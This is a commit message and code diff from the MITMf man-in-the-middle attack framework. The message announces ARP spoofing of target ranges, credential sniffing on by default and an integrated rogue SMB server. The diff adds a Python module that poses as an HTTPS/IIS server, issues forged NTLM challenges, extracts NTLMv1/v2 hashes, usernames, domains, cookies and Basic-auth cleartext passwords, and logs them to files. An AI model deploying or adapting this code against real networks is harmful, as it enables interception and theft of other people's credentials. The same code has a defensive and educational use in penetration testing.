This is 1/2 of the work done... lot's of cool stuff!

I've re-written a decent amount of the framework to support dynamic config file updates, revamped the ARP Spoofing 'engine' and changed the way MITMf integrates Responder and Netcreds.

- Net-creds is now started by default and no longer a plugin.. It's all about getting those creds after all.
- Integrated the Subterfuge Framework's ARPWatch script, it will enable itself when spoofing the whole subnet (also squashed bugs in the original ARP spoofing code)
- The spoof plugin now supports specifying a range of targets (e.g. --target 10.10.10.1-15) and multiple targets (e.g. --target 10.10.10.1,10.10.10.2)
- An SMB Server is now started by default, MITMf now uses Impacket's SMBserver as supposed to the one built into Responder, mainly for 2 reasons:
  1) Impacket is moving towards SMB2 support and is actively developed
  2) Impacket's SMB server is fully functional as supposed to Responder's (will be adding a section for it in the config file)
  3) Responder's SMB server was unrealiable when used through MITMf (After spending a day trying to figure out why, I just gave up and yanked it out)

- Responder's code has been broken down into single importable classes (way easier to manage and read, ugh!)
- Started adding dynamic config support to Responder's code and changed the logging messages to be a bit more readable.
- POST data captured through the proxy will now only be logged and printed to STDOUT when it's decodable to UTF-8 (this prevents logging encrypted data which is no use)
- Responder and the Beefapi script are no longer submodules (they seem to be a pain to package, so i removed them to help a brother out)
- Some plugins are missing because I'm currently re-writing them, will be added later
- Main plugin class now inharates from the ConfigWatcher class, this way plugins will support dynamic configs natively! \o/

core/protocols/http/HTTPSProxy.py

@@ -0,0 +1,145 @@
+##################################################################################
+#HTTPS Server stuff starts here (Not Used)
+##################################################################################
+
+class HTTPSProxy():
+
+	def serve_thread_SSL(host, port, handler):
+		try:
+			server = SSlSock((host, port), handler)
+			server.serve_forever()
+		except Exception, e:
+			print "Error starting TCP server on port %s: %s:" % (str(port),str(e))
+
+	#Function name self-explanatory
+	def start(SSL_On_Off):
+		if SSL_On_Off == "ON":
+			t = threading.Thread(name="SSL", target=self.serve_thread_SSL, args=("0.0.0.0", 443,DoSSL))        
+			t.setDaemon(True)
+			t.start()
+			return t
+		if SSL_On_Off == "OFF":
+			return False
+
+class SSlSock(ThreadingMixIn, TCPServer):
+	def __init__(self, server_address, RequestHandlerClass):
+		BaseServer.__init__(self, server_address, RequestHandlerClass)
+		ctx = SSL.Context(SSL.SSLv3_METHOD)
+		ctx.use_privatekey_file(SSLkey)
+		ctx.use_certificate_file(SSLcert)
+		self.socket = SSL.Connection(ctx, socket.socket(self.address_family, self.socket_type))
+		self.server_bind()
+		self.server_activate()
+
+	def shutdown_request(self,request):
+		try:
+			request.shutdown()
+		except:
+			pass
+
+class DoSSL(StreamRequestHandler):
+	def setup(self):
+		self.exchange = self.request
+		self.rfile = socket._fileobject(self.request, "rb", self.rbufsize)
+		self.wfile = socket._fileobject(self.request, "wb", self.wbufsize)
+
+	def handle(self):
+		try:
+			while True:
+				data = self.exchange.recv(8092)
+				self.exchange.settimeout(0.5)
+				buff = WpadCustom(data,self.client_address[0])
+				if buff:
+					self.exchange.send(buff)
+				else:
+					buffer0 = HTTPSPacketSequence(data,self.client_address[0])
+					self.exchange.send(buffer0)
+		except:
+			pass
+
+#Parse NTLMv1/v2 hash.
+def ParseHTTPSHash(data,client):
+	LMhashLen = struct.unpack('<H',data[12:14])[0]
+	LMhashOffset = struct.unpack('<H',data[16:18])[0]
+	LMHash = data[LMhashOffset:LMhashOffset+LMhashLen].encode("hex").upper()
+	NthashLen = struct.unpack('<H',data[20:22])[0]
+	NthashOffset = struct.unpack('<H',data[24:26])[0]
+	NTHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+	if NthashLen == 24:
+		#print "[+]HTTPS NTLMv1 hash captured from :",client
+		responder_logger.info('[+]HTTPS NTLMv1 hash captured from :%s'%(client))
+		NtHash = data[NthashOffset:NthashOffset+NthashLen].encode("hex").upper()
+		HostNameLen = struct.unpack('<H',data[46:48])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		Hostname = data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		#print "Hostname is :", Hostname
+		responder_logger.info('[+]HTTPS NTLMv1 Hostname is :%s'%(Hostname))
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		#print "User is :", data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		responder_logger.info('[+]HTTPS NTLMv1 User is :%s'%(data[UserOffset:UserOffset+UserLen].replace('\x00','')))
+		outfile = "./logs/responder/HTTPS-NTLMv1-Client-"+client+".txt"
+		WriteHash = User+"::"+Hostname+":"+LMHash+":"+NtHash+":"+NumChal
+		WriteData(outfile,WriteHash, User+"::"+Hostname)
+		#print "Complete hash is : ", WriteHash
+		responder_logger.info('[+]HTTPS NTLMv1 Complete hash is :%s'%(WriteHash))
+	if NthashLen > 24:
+		#print "[+]HTTPS NTLMv2 hash captured from :",client
+		responder_logger.info('[+]HTTPS NTLMv2 hash captured from :%s'%(client))
+		NthashLen = 64
+		DomainLen = struct.unpack('<H',data[28:30])[0]
+		DomainOffset = struct.unpack('<H',data[32:34])[0]
+		Domain = data[DomainOffset:DomainOffset+DomainLen].replace('\x00','')
+		#print "Domain is : ", Domain
+		responder_logger.info('[+]HTTPS NTLMv2 Domain is :%s'%(Domain))
+		UserLen = struct.unpack('<H',data[36:38])[0]
+		UserOffset = struct.unpack('<H',data[40:42])[0]
+		User = data[UserOffset:UserOffset+UserLen].replace('\x00','')
+		#print "User is :", User
+		responder_logger.info('[+]HTTPS NTLMv2 User is : %s'%(User))
+		HostNameLen = struct.unpack('<H',data[44:46])[0]
+		HostNameOffset = struct.unpack('<H',data[48:50])[0]
+		HostName =  data[HostNameOffset:HostNameOffset+HostNameLen].replace('\x00','')
+		#print "Hostname is :", HostName
+		responder_logger.info('[+]HTTPS NTLMv2 Hostname is :%s'%(HostName))
+		outfile = "./logs/responder/HTTPS-NTLMv2-Client-"+client+".txt"
+		WriteHash = User+"::"+Domain+":"+NumChal+":"+NTHash[:32]+":"+NTHash[32:]
+		WriteData(outfile,WriteHash, User+"::"+Domain)
+		#print "Complete hash is : ", WriteHash
+		responder_logger.info('[+]HTTPS NTLMv2 Complete hash is :%s'%(WriteHash))
+
+#Handle HTTPS packet sequence.
+def HTTPSPacketSequence(data,client):
+	a = re.findall('(?<=Authorization: NTLM )[^\\r]*', data)
+	b = re.findall('(?<=Authorization: Basic )[^\\r]*', data)
+	if a:
+		packetNtlm = b64decode(''.join(a))[8:9]
+		if packetNtlm == "\x01":
+			GrabCookie(data,client)
+			r = NTLM_Challenge(ServerChallenge=Challenge)
+			r.calculate()
+			t = IIS_NTLM_Challenge_Ans()
+			t.calculate(str(r))
+			buffer1 = str(t)
+			return buffer1
+		if packetNtlm == "\x03":
+			NTLM_Auth= b64decode(''.join(a))
+			ParseHTTPSHash(NTLM_Auth,client)
+			buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
+			return buffer1
+	if b:
+		GrabCookie(data,client)
+		outfile = "./logs/responder/HTTPS-Clear-Text-Password-"+client+".txt"
+		WriteData(outfile,b64decode(''.join(b)), b64decode(''.join(b)))
+		#print "[+]HTTPS-User & Password:", b64decode(''.join(b))
+		responder_logger.info('[+]HTTPS-User & Password: %s'%(b64decode(''.join(b))))
+		buffer1 = str(IIS_Auth_Granted(Payload=HTMLToServe))
+		return buffer1
+
+	else:
+		return str(Basic_Ntlm(Basic))
+
+##################################################################################
+#HTTPS Server stuff ends here (Not Used)
+##################################################################################